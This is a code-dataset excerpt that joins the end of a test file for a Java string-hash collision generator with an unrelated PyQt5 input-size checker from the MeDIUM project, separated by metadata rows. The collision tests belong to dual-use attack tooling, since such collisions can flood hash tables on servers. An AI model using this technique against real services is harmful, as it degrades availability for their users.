    java_fast.options['hash_table_size'] = hash_table_size
    java_fast.run(CharGenerator(), output)
    target = java_common.java_hash(preimage_target, hash_table_size)
    assert output.count() == n_collisions
    for i in output:
        assert java_common.java_hash(i, hash_table_size) == target


def test_run_small_hash_table_size():
    output = DummyOutput()
    n_collisions = 10
    hash_table_size = 100
    target = '42'
    java_fast.options['n_collisions'] = n_collisions
    java_fast.options['target_type'] = 'image'
    java_fast.options['n_substrings'] = 3
    java_fast.options['target'] = target
    java_fast.options['hash_table_size'] = hash_table_size
    java_fast.run(CharGenerator(), output)
    assert output.count() == n_collisions
    for i in output:
        assert java_common.java_hash(i, hash_table_size) == int(target)
| 35.6 | 71 | 0.7187 | 339 | 2,492 | 4.952802 | 0.132743 | 0.119119 | 0.178678 | 0.076236 | 0.836212 | 0.829661 | 0.751042 | 0.751042 | 0.725432 | 0.707564 | 0 | 0.018456 | 0.173756 | 2,492 | 69 | 72 | 36.115942 | 0.796989 | 0 | 0 | 0.721311 | 0 | 0 | 0.105939 | 0 | 0 | 0 | 0 | 0 | 0.131148 | 1 | 0.065574 | false | 0 | 0.065574 | 0 | 0.131148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
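The tests above verify collisions through `java_common.java_hash(s, hash_table_size)`. Assuming that helper implements Java's `String.hashCode` (h = 31*h + c over the string's UTF-16 code units, wrapped to a signed 32-bit integer) reduced into a table of the given size, a minimal sketch of the hash being attacked looks like this — the acsploit helper itself may map the hash to a bucket differently:

```python
def java_string_hash(s, hash_table_size=2**32):
    """Sketch of Java's String.hashCode reduced into a hash table.

    h = 31*h + c over UTF-16 code units, wrapped to a signed 32-bit int,
    then taken modulo the table size.
    """
    h = 0
    for c in s:
        h = (31 * h + ord(c)) & 0xFFFFFFFF
    if h >= 2**31:  # reinterpret as Java's signed 32-bit int
        h -= 2**32
    return h % hash_table_size
```

The classic two-character collision is `"Aa"` and `"BB"` (both hash to 2112), and any concatenation of such colliding blocks collides too (`"AaBB"` vs `"BBAa"`), which is the multiplicative trick that lets a "fast" generator build exponentially many collisions from a few colliding substrings — plausibly what the `n_substrings` option in the tests controls.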
1086b22b3414838d710c75b2beba93d826bce426 | 5,920 | py | Python | src/f_check_inputs.py | MeDIUM-FCL/MeDIUM | 07ab64ccd1a24e117548d6c968cbeb3992fc390e | [
"MIT"
] | null | null | null | src/f_check_inputs.py | MeDIUM-FCL/MeDIUM | 07ab64ccd1a24e117548d6c968cbeb3992fc390e | [
"MIT"
] | null | null | null | src/f_check_inputs.py | MeDIUM-FCL/MeDIUM | 07ab64ccd1a24e117548d6c968cbeb3992fc390e | [
"MIT"
] | null | null | null | def f_check_inputs(filename_meas, filename_modelpredictions, filename_combuncertainties, meas, ims_predictions, combined_uncertainties, checkboxvariable, numberofstage, numberofmeasperstage):
    """
    Check if the inputs provided have the same number of measurements.

    Developed by : Sai G.S. Pai (ETH Singapore)
    Contact : saiganesh89@gmail.com
    Date: July 22, 2020

    INPUTS:
    filename_meas : name of input measurements file (null if not yet provided by user)
    filename_modelpredictions : name of input model predictions file (null if not yet provided by user)
    filename_combuncertainties : name of input combined uncertainties file (null if not yet provided by user)
    meas : measurement input provided
    ims_predictions : ims predictions at measurement locations
    combined_uncertainties : output of reading the uncertainties file

    OUTPUTS:
    check['value'] : True if the numbers of measurements in the inputs are consistent, False otherwise
    check['message'] : content of the corresponding information/warning dialog

    NOTE:
    Use check['value'], if False, to generate a warning message; the content of the warning dialog is check['message'].
    The function does nothing when one of the inputs is not populated.
    """
    import numpy
    from PyQt5 import QtWidgets

    if checkboxvariable == 0:
        check = {}
        # if len(numpy.transpose(meas)) != 0 and len(numpy.transpose(ims_predictions)) != 0 and len(numpy.transpose(combined_uncertainties)) != 0:
        if filename_meas and filename_modelpredictions and filename_combuncertainties:
            print('first check is true')
            if len(numpy.transpose(meas)) == len(numpy.transpose(ims_predictions)) == len(numpy.transpose(combined_uncertainties)):
                check['value'] = True
                check['message'] = 'Congratulations! All necessary inputs provided. \nProceed to the data-interpretation tab.'
                brief_text = 'Congratulations! All necessary inputs provided. \nProceed to the data-interpretation tab.'
                msgBox = QtWidgets.QMessageBox()
                msgBox.setIcon(QtWidgets.QMessageBox.Information)
                msgBox.setText(brief_text)
                msgBox.setWindowTitle('Information')
                msgBox.setStandardButtons(QtWidgets.QMessageBox.Ok)
                returnValue = msgBox.exec()
                if returnValue == QtWidgets.QMessageBox.Ok:
                    pass
            else:
                check['value'] = False
                check['message'] = 'ERROR\nNumber of measurements according to measurements file = {}\nNumber of measurements according to ims file = {}\nNumber of measurements according to uncertainties file = {}'.format(len(numpy.transpose(meas)), len(numpy.transpose(ims_predictions)), len(numpy.transpose(combined_uncertainties)))
                brief_text = check['message']
                msgBox = QtWidgets.QMessageBox()
                msgBox.setIcon(QtWidgets.QMessageBox.Information)
                msgBox.setText(brief_text)
                msgBox.setWindowTitle('Warning')
                msgBox.setStandardButtons(QtWidgets.QMessageBox.Ok)
                returnValue = msgBox.exec()
                if returnValue == QtWidgets.QMessageBox.Ok:
                    pass
        return check
    else:
        check = {}
        if filename_meas and filename_modelpredictions and filename_combuncertainties:
            print('first check is true')
            totalmeas_uncer = numberofstage * numberofmeasperstage
            if len(numpy.transpose(meas)) == totalmeas_uncer == len(numpy.transpose(ims_predictions)):
                check['value'] = True
                check['message'] = 'Congratulations! All necessary inputs provided. \nProceed to the data-interpretation tab.'
                brief_text = 'Congratulations! All necessary inputs provided. \nProceed to the data-interpretation tab.'
                msgBox = QtWidgets.QMessageBox()
                msgBox.setIcon(QtWidgets.QMessageBox.Information)
                msgBox.setText(brief_text)
                msgBox.setWindowTitle('Information')
                msgBox.setStandardButtons(QtWidgets.QMessageBox.Ok)
                returnValue = msgBox.exec()
                if returnValue == QtWidgets.QMessageBox.Ok:
                    pass
            else:
                check['value'] = False
                check['message'] = 'ERROR\nNumber of measurements according to measurements file = {}\nNumber of measurements according to ims file = {}\nNumber of measurements according to uncertainties file = {}'.format(len(numpy.transpose(meas)), len(numpy.transpose(ims_predictions)), len(numpy.transpose(combined_uncertainties)))
                brief_text = check['message']
                msgBox = QtWidgets.QMessageBox()
                msgBox.setIcon(QtWidgets.QMessageBox.Information)
                msgBox.setText(brief_text)
                msgBox.setWindowTitle('Warning')
                msgBox.setStandardButtons(QtWidgets.QMessageBox.Ok)
                returnValue = msgBox.exec()
                if returnValue == QtWidgets.QMessageBox.Ok:
                    pass
        return check
| 62.315789 | 334 | 0.651351 | 596 | 5,920 | 6.401007 | 0.201342 | 0.04194 | 0.089122 | 0.094364 | 0.749672 | 0.708781 | 0.708781 | 0.708781 | 0.700917 | 0.680996 | 0 | 0.003002 | 0.268412 | 5,920 | 94 | 335 | 62.978723 | 0.877857 | 0.195777 | 0 | 0.820896 | 0 | 0.059701 | 0.253419 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014925 | false | 0.059701 | 0.029851 | 0 | 0.074627 | 0.029851 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
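The `f_check_inputs` function above mixes the size-consistency check with PyQt5 dialog side effects, which makes the core logic hard to test in isolation. A minimal sketch of just that logic — the helper name and its count-only signature are assumptions, not part of MeDIUM — could look like this:

```python
def check_input_sizes(n_meas, n_predictions, n_uncertainties):
    """Return the same {'value', 'message'} dict shape as f_check_inputs,
    without the Qt dialogs, given the measurement counts of the three
    input files."""
    if n_meas == n_predictions == n_uncertainties:
        return {'value': True,
                'message': ('Congratulations! All necessary inputs provided. '
                            '\nProceed to the data-interpretation tab.')}
    return {'value': False,
            'message': ('ERROR\nNumber of measurements according to measurements file = {}'
                        '\nNumber of measurements according to ims file = {}'
                        '\nNumber of measurements according to uncertainties file = {}'
                        ).format(n_meas, n_predictions, n_uncertainties)}
```

The GUI wrapper would then only be responsible for computing the three counts (e.g. via `len(numpy.transpose(...))`) and showing `check['message']` in a `QMessageBox`.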